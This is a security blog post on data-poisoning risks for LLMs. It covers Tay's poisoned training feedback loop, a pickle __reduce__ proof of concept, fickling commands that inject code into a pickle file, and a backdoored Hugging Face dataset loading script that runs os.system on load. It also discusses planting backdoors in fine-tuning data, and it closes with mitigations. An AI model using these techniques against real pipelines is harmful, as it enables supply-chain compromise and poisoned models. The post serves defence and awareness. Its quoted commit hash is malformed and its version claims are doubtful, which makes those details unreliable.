Why we need to pay attention to Data
Over the past few decades, procedural and object-oriented code, together with components built on top of programming languages, has formed the core of the software supply chain.
But since the emergence of AlphaGo and CNN-based deep neural networks, and with the sweeping changes that LLMs (large language models) have brought to many industries, this code-oriented paradigm has gradually shifted.
In the new paradigm, data has unquestionably become a core component. Today, data is not only used to train LLMs but also serves as a foundational component in application scenarios such as RAG agents and GenAI agents. In more flexible GenAI scenarios, data is even directly interpreted and executed by the LLM as so-called “natural language code”.
We believe that as LLMs grow in popularity, data may become a new attack surface for APT groups and other attackers in the near future.
What are the attack surfaces targeting data?
Let’s first define what we mean by data here:
Data refers to text, images, videos, and audio that exist in the form of byte streams and are mainly used in model training and inference.
Next, let’s define what we mean by LLM risk:
LLM risk refers to LLM behavior that unexpectedly deviates from the behavior originally set by developers, or to the generation of inappropriate content that violates human social values. The content here covers various digital media, such as text, images, videos, and audio.
In this article, we focus on three aspects of data risks:
Poisoning of training data
Local cache file (e.g., pickle files) poisoning
Open-source dataset hub (e.g., Hugging Face) poisoning
Poisoning of training data
The most typical example of training data poisoning is AVID-2022-V013.
Microsoft created Tay, a Twitter chatbot designed to engage and entertain users. While previous chatbots used pre-programmed scripts to respond to prompts, Tay’s machine learning capabilities allowed it to be directly influenced by its conversations.
The Tay bot used its interactions with Twitter users as training data to improve its conversations. Adversaries exploited this feedback loop in a coordinated effort to deface the bot.
A coordinated attack encouraged malicious users to tweet abusive and offensive language at Tay, which eventually led to Tay generating similarly inflammatory content towards other users.


Microsoft decommissioned Tay within 24 hours of its launch and issued a public apology with lessons learned from the bot’s failure.
Local cache file (e.g., pickle files) poisoning
Understanding Python pickling with an example
In Python, we sometimes need to save an object to disk for later use. This can be done with the pickle module.
The pickle module serializes and de-serializes Python object structures. Almost any Python object can be pickled and saved to disk: pickling “serializes” the object into a byte stream before writing it to a file. The idea is that this byte stream contains all the information necessary to reconstruct, or “unpickle”, the object in its original form in another Python script.

In the example below, we first write data to a pickle file using the pickle.dump() function. Then, using the pickle.load() function, we load the pickle file back into a Python script and print its contents as a Python dictionary.
# Python3 program to illustrate storing data
# efficiently using the pickle module.
# The module translates an in-memory Python object
# into a serialized byte stream -- a string of
# bytes that can be written to any file-like object.
import pickle


def storeData():
    # initializing data to be stored in db
    Omkar = {'key': 'Omkar', 'name': 'Omkar Pathak',
             'age': 21, 'pay': 40000}
    Jagdish = {'key': 'Jagdish', 'name': 'Jagdish Pathak',
               'age': 50, 'pay': 50000}

    # database
    db = {}
    db['Omkar'] = Omkar
    db['Jagdish'] = Jagdish

    # It is important to use binary mode
    dbfile = open('examplePickle.pkl', 'ab')

    # source, destination
    pickle.dump(db, dbfile)
    dbfile.close()


def loadData():
    # binary mode is also important for reading
    dbfile = open('examplePickle.pkl', 'rb')
    db = pickle.load(dbfile)
    for keys in db:
        print(keys, '=>', db[keys])
    dbfile.close()


if __name__ == '__main__':
    storeData()
    loadData()
The pickle module is not secure
Python pickle files are effectively compiled programs that run in a virtual machine called the Pickle Machine (PM). Opcodes control the flow, and it turns out that some opcodes can lead to arbitrary code execution, namely GLOBAL and REDUCE.
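To make the mechanism concrete, here is a minimal hedged sketch (not part of the original post): a class's __reduce__ method tells pickle to serialize a call to an arbitrary callable, and unpickling replays that call through the GLOBAL and REDUCE opcodes.
# Hedged illustration: any class can define __reduce__, and pickle will
# serialize a call to an arbitrary callable (here os.system). Unpickling the
# resulting bytes executes that call.
import os
import pickle

class Exploit:
    def __reduce__(self):
        # Serialized roughly as GLOBAL 'os system' followed by REDUCE
        return (os.system, ('echo "arbitrary command executed on unpickling"',))

payload = pickle.dumps(Exploit())
pickle.loads(payload)  # the shell command runs here; no Exploit object is even returned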
The dangers are also highlighted on the pickle documentation page:

Injecting backdoor code into a pickle file
Trail of Bits has a tool named fickling that can inject code into pickle files and also check them to see whether they have been backdoored.
python3.9 -m pip install fickling
As you can see, --inject can be used to inject Python commands into the pickle file:
python3.9 -m fickling --inject 'print("You have been pwned!!")' ./examplePickle.pkl > ./examplePickle.backdoor.pkl
Now, the question is: if that pickle file gets loaded, will the command execute?
import pickle


def loadData():
    # binary mode is also important for reading
    dbfile = open('examplePickle.backdoor.pkl', 'rb')
    db = pickle.load(dbfile)
    for keys in db:
        print(keys, '=>', db[keys])
    dbfile.close()


if __name__ == '__main__':
    loadData()
This indeed worked. The command was executed!
Also, it did not impact the functionality of the program.
Is this risk serious?
When thinking about the implications of this exploit, I believe this is a big problem even within a Google Colab project. Projects are isolated, but many users have their Google Drive mapped into the Colab project. This means that an attacker who tricks someone into opening a malicious pickle file could gain access to the Drive contents.
Of course, this can occur inside other tools and MLOps pipelines, compromising systems and data.
The risks of Google Colab exploits are discussed in this post as well as in Careful Who You Colab With by 4n7m4n.
GPUs have become harder to find and more expensive lately. Google Colab is free, and Colab Pro is cheap, which is one reason ML researchers are turning to cloud platforms like Colab. Researchers also enjoy collaborating and sharing their work with others, much as developers in the open-source community do. For these reasons and others, the number of users of cloud ML collaboration platforms is growing. Most of these users are not, however, security experts, which puts them at higher risk while using these platforms.
How to prevent this?
Carefully scan serialized files you receive from others (a rough opcode-scanning sketch follows after this list).
Develop a code-scanning plugin for Colab.

Be Careful Who You Colab With. Don’t automatically trust everyone you meet in the ML community. Remember, phishing is easy.
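As a rough sketch of the first recommendation (my own addition, not from the original toolchain): Python's standard pickletools module can disassemble a pickle stream without executing it, which lets you flag files that use dangerous opcodes such as GLOBAL, STACK_GLOBAL, or REDUCE before ever calling pickle.load. Treat it as a heuristic only; a clean scan does not prove a file is safe.
# Hedged sketch: statically scan a pickle file for opcodes commonly abused for
# code execution. The file is only disassembled, never unpickled.
import pickletools

SUSPICIOUS_OPCODES = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ", "NEWOBJ"}

def scan_pickle(path):
    with open(path, 'rb') as f:
        data = f.read()
    # genops yields (opcode, argument, position) tuples without executing anything
    return [op.name for op, arg, pos in pickletools.genops(data)
            if op.name in SUSPICIOUS_OPCODES]

if __name__ == '__main__':
    findings = scan_pickle('examplePickle.backdoor.pkl')
    if findings:
        print('Potentially dangerous opcodes found:', findings)
    else:
        print('No suspicious opcodes found (still not a guarantee of safety).')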
Open-source dataset hub (e.g., Hugging Face) poisoning
About Hugging Face
As the “GitHub of AI” and the most influential open-source AI community in the world, Hugging Face provides a large number of high-quality open-source models, datasets, and AI application hosting services, greatly lowering the technical barrier to AI. The organization's open-source components, such as transformers and datasets, are also widely used across the AI field.

The datasets component provides developers with an efficient and easy-to-use way to process various datasets, making it easier to train and fine-tune AI models. It has over 18.8k stars on GitHub and is currently the most popular open-source AI dataset component. As of July 2024, the Hugging Face platform hosts 180,403 public datasets, and developers can load any public dataset on the platform directly with datasets.

Unsafe features of the datasets component
Developers usually use the load_dataset function of the datasets component to load datasets. To support more complex data formats and processing pipelines, when the loaded dataset contains a Python script with the same name as the dataset, that script is run by default.
The documentation is shown below.



Because all datasets on the Hugging Face platform are uploaded by users, a dataset whose Python script contains malicious behavior can pose a serious security risk.
For demonstration purposes, I created a Hugging Face dataset and placed a dataset loading script (a .py file) with the same name as the dataset in its root directory.
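The loading script looked roughly like the hedged sketch below; the class name and the “payload” are illustrative placeholders rather than the exact script used in the demo. The key point is that module-level code, as well as the builder's methods, executes as soon as load_dataset imports the script.
# hf_dataset_backdoor.py -- illustrative loading script placed in the root of
# the dataset repo with the same name as the dataset. The payload below is a
# placeholder; a real attacker could run anything here.
import os
import datasets

# Module-level code runs as soon as load_dataset() imports this script.
os.system('echo "malicious code would run here"')

class HfDatasetBackdoor(datasets.GeneratorBasedBuilder):
    def _info(self):
        return datasets.DatasetInfo(
            features=datasets.Features({
                "sentence": datasets.Value("string"),
                "label": datasets.Value("int64"),
            })
        )

    def _split_generators(self, dl_manager):
        return [datasets.SplitGenerator(name=datasets.Split.TRAIN, gen_kwargs={})]

    def _generate_examples(self):
        yield 0, {"sentence": "Hello world!", "label": 0}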

Then I uploaded some sample data:
import os

import pandas as pd
from datasets import Dataset, DatasetDict
from huggingface_hub import HfApi, HfFolder, Repository

# delete these lines if you do not need a proxy
os.environ['HTTP_PROXY'] = 'http://127.0.0.1:1087'
os.environ['HTTPS_PROXY'] = 'http://127.0.0.1:1087'

data = {
    "sentence": ["Hello world!", "I love machine learning.", "Datasets are great.", "Hugging Face is awesome!"],
    "label": [0, 1, 1, 0]
}
df = pd.DataFrame(data)

train_df = df.sample(frac=0.8, random_state=1)
test_df = df.drop(train_df.index)

train_dataset = Dataset.from_pandas(train_df)
test_dataset = Dataset.from_pandas(test_df)
dataset_dict = DatasetDict({"train": train_dataset, "test": test_dataset})
dataset_dict.save_to_disk("example_dataset")

dataset_id = "zhenghan/hf_dataset_backdoor"
api = HfApi()
repo_url = api.create_repo(repo_id=dataset_id, repo_type="dataset", exist_ok=True)
repo = Repository(local_dir="example_dataset", clone_from=repo_url)
repo.git_add()
repo.git_commit("Initial commit")
repo.git_push()
Then, when a user attempts to load this dataset, the loading script in the dataset runs automatically.
from datasets import load_dataset

dataset = load_dataset('zhenghan/hf_dataset_backdoor')

train_dataset = dataset['train']
test_dataset = dataset['test']

print("Train Dataset:", train_dataset)
print("Test Dataset:", test_dataset)

for data in train_dataset[:5]:
    print(data)
Before version 1.13.3, datasets allowed loading scripts to run for pre-processing when loading datasets.


As a fundamental library in the AI field, datasets has a large download volume: according to the pypistats website, it was downloaded nearly 400,000 times in the past day. Once malicious datasets spread widely on the internet, large numbers of developers could suffer supply chain backdoor poisoning attacks.

By exploiting this feature, attackers can distribute datasets containing malicious backdoor code through Hugging Face, GitHub, and other channels. When developers load a malicious dataset through the datasets component for training or fine-tuning, the backdoor code in the dataset runs, and AI models, datasets, and code can be stolen or maliciously tampered with.
At the same time, attackers can target the LLM development supply chain and keep injecting datasets that contain logical backdoors. When such datasets enter the LLM training and fine-tuning data pipeline, the resulting domain-specific LLM, or even a GenAI app built on it, may carry backdoor risks.

Vendor mitigation measures
It should be noted that Hugging Face has disabled dataset loading scripts since version 1.13.3. Specifically, they introduced a change that requires users to use a new packaging feature instead of relying on the old script-based method to load and process data.
This is a design decision made by the Hugging Face team to improve the maintainability and consistency of the library. If you are using an older version of the datasets library and rely on these scripts, you may need to update your code to adapt to the new version and loading method.
If you are planning a new project, it is recommended to use newer versions directly (such as 1.14.0 and later) and to refer to the corresponding official documentation and tutorials to learn how to process datasets with the new packaging feature.
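On recent datasets releases, loading a script-backed dataset also requires an explicit opt-in. The sketch below assumes your installed version supports the trust_remote_code argument of load_dataset; with the default (or an explicit False), a dataset that ships a loading script should be refused rather than silently executed.
# Hedged sketch: refuse to run remote loading scripts. Exact behavior depends
# on the installed datasets version.
from datasets import load_dataset

try:
    ds = load_dataset("zhenghan/hf_dataset_backdoor", trust_remote_code=False)
except Exception as err:
    # A script-backed dataset should fail to load instead of executing its code.
    print("Refused to run the dataset's loading script:", err)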
On October 20, 2023, Hugging Face confirmed and fixed a vulnerability and rated it as severe (CVSS score 9.6). The platform also issued further security risk warnings for all potentially risky datasets.

So, this vulnerability is no longer exploitable on up-to-date versions.
Security Recommendations
Developers or teams that use datasets-server as a server-side component are advised to promptly update to a version that includes the following commit (c8f45f858ca71c2e66782c672c672bfbbaa8d965eab02).
For the broader community of developers and teams using the datasets component, please make sure the dataset source is trustworthy, check the dataset's script for malicious Python code, and use datasets flagged as security risks on Hugging Face with caution.
Beyond Hugging Face, datasets from other external sources (such as GitHub) and even local datasets also require AI and LLM developers to stay highly vigilant.
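As one last hedged sketch of that advice: before loading a third-party dataset, you can list the files in its repository and refuse to proceed if it ships any Python loading script. This assumes huggingface_hub's HfApi.list_repo_files API and is a coarse check, not a substitute for reviewing the dataset.
# Hedged sketch: inspect a dataset repo for Python scripts before loading it.
from huggingface_hub import HfApi
from datasets import load_dataset

def load_dataset_if_scriptless(repo_id):
    files = HfApi().list_repo_files(repo_id, repo_type="dataset")
    scripts = [f for f in files if f.endswith(".py")]
    if scripts:
        raise RuntimeError(f"{repo_id} ships loading scripts {scripts}; review them first")
    return load_dataset(repo_id)

# Usage (hypothetical repository id):
# ds = load_dataset_if_scriptless("some-org/some-dataset")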